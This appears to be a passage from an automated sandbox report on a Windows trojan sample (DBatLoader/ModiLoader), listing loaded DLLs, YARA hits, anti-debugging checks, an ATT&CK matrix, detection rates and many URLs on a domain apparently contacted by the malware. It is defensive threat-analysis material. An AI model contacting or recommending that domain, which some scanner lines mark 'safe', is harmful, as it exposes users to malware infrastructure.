            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: LbZ88q4uPa.exeStatic file information: File size 1161216 > 1048576

            Data Obfuscation

            barindex
            Yara detected DBatLoader
            Source: Yara matchFile source: 0.2.LbZ88q4uPa.exe.22965a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LbZ88q4uPa.exe.2850000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.LbZ88q4uPa.exe.22965a8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.2954365899.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.2938050052.0000000002296000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02868798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02868798
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028532FC push eax; ret 0_2_02853338
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287D2FC push 0287D367h; ret 0_2_0287D35F
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285635C push 028563B7h; ret 0_2_028563AF
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285635A push 028563B7h; ret 0_2_028563AF
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287D0AC push 0287D125h; ret 0_2_0287D11D
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287D1F8 push 0287D288h; ret 0_2_0287D280
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287D144 push 0287D1ECh; ret 0_2_0287D1E4
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028686B8 push 028686FAh; ret 0_2_028686F2
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02856736 push 0285677Ah; ret 0_2_02856772
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02856738 push 0285677Ah; ret 0_2_02856772
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285C4EC push ecx; mov dword ptr [esp], edx0_2_0285C4F1
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285D520 push 0285D54Ch; ret 0_2_0285D544
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285CB6C push 0285CCF2h; ret 0_2_0285CCEA
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286788C push 02867909h; ret 0_2_02867901
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028668C6 push 02866973h; ret 0_2_0286696B
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028668C8 push 02866973h; ret 0_2_0286696B
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286E9E8 push ecx; mov dword ptr [esp], edx0_2_0286E9ED
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286890E push 02868948h; ret 0_2_02868940
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286A917 push 0286A950h; ret 0_2_0286A948
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02868910 push 02868948h; ret 0_2_02868940
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286A918 push 0286A950h; ret 0_2_0286A948
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285C95E push 0285CCF2h; ret 0_2_0285CCEA
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02862EE0 push 02862F56h; ret 0_2_02862F4E
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0287BFA0 push 0287C1C8h; ret 0_2_0287C1C0
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02862FEC push 02863039h; ret 0_2_02863031
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02862FEB push 02863039h; ret 0_2_02863031
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02865DFC push ecx; mov dword ptr [esp], edx0_2_02865DFE
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286A954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0286A954
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028558B4
            Source: LbZ88q4uPa.exe, 00000000.00000002.2937308128.000000000063E000.00000004.00000020.00020000.00000000.sdmp, LbZ88q4uPa.exe, 00000000.00000002.2937308128.000000000069E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeAPI call chain: ExitProcess graph end nodegraph_0-25848

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0286F024
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_02868798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02868798
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02855A78
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: GetLocaleInfoA,0_2_0285A790
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: GetLocaleInfoA,0_2_0285A744
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02855B84
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285918C GetLocalTime,0_2_0285918C
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0285B70C GetVersionExA,0_2_0285B70C

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		1
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Valid Accounts            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Access Token Manipulation            		LSASS Memory1
            Query Registry            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            System Network Connections Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            LbZ88q4uPa.exe82%VirustotalBrowse
            LbZ88q4uPa.exe76%ReversingLabsWin32.Trojan.ModiLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://amazonenviro.com:443/245_NsltarpnconZZZZ:s0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconL0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon.64.1.10%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconW0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconi0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconP0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconb0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconclose0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconV0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconc0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon0%Avira URL Cloudsafe
            https://amazonenviro.com/h0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconj0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon8i80%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpnconiro.comhtep0%Avira URL Cloudsafe
            https://amazonenviro.com/o0%Avira URL Cloudsafe
            https://amazonenviro.com/w0%Avira URL Cloudsafe
            https://amazonenviro.com/g0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconq0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncony0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon5zm0%Avira URL Cloudsafe
            https://amazonenviro.com/X0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon0%Avira URL Cloudsafe
            https://amazonenviro.com/_0%Avira URL Cloudsafe
            https://amazonenviro.com/245_NsltarpnconM~.0%Avira URL Cloudsafe
            https://amazonenviro.com/J0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpnconc)0%Avira URL Cloudsafe
            https://amazonenviro.com/80%Avira URL Cloudsafe
            https://amazonenviro.com/?0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Nsltarpncon_0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon)0%Avira URL Cloudsafe
            https://amazonenviro.com/0%Avira URL Cloudsafe
            https://amazonenviro.com/(0%Avira URL Cloudsafe
            https://amazonenviro.com//0%Avira URL Cloudsafe
            https://amazonenviro.com/70%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon50%Avira URL Cloudsafe
            https://amazonenviro.com/245_Nsltarpncon00%Avira URL Cloudsafe
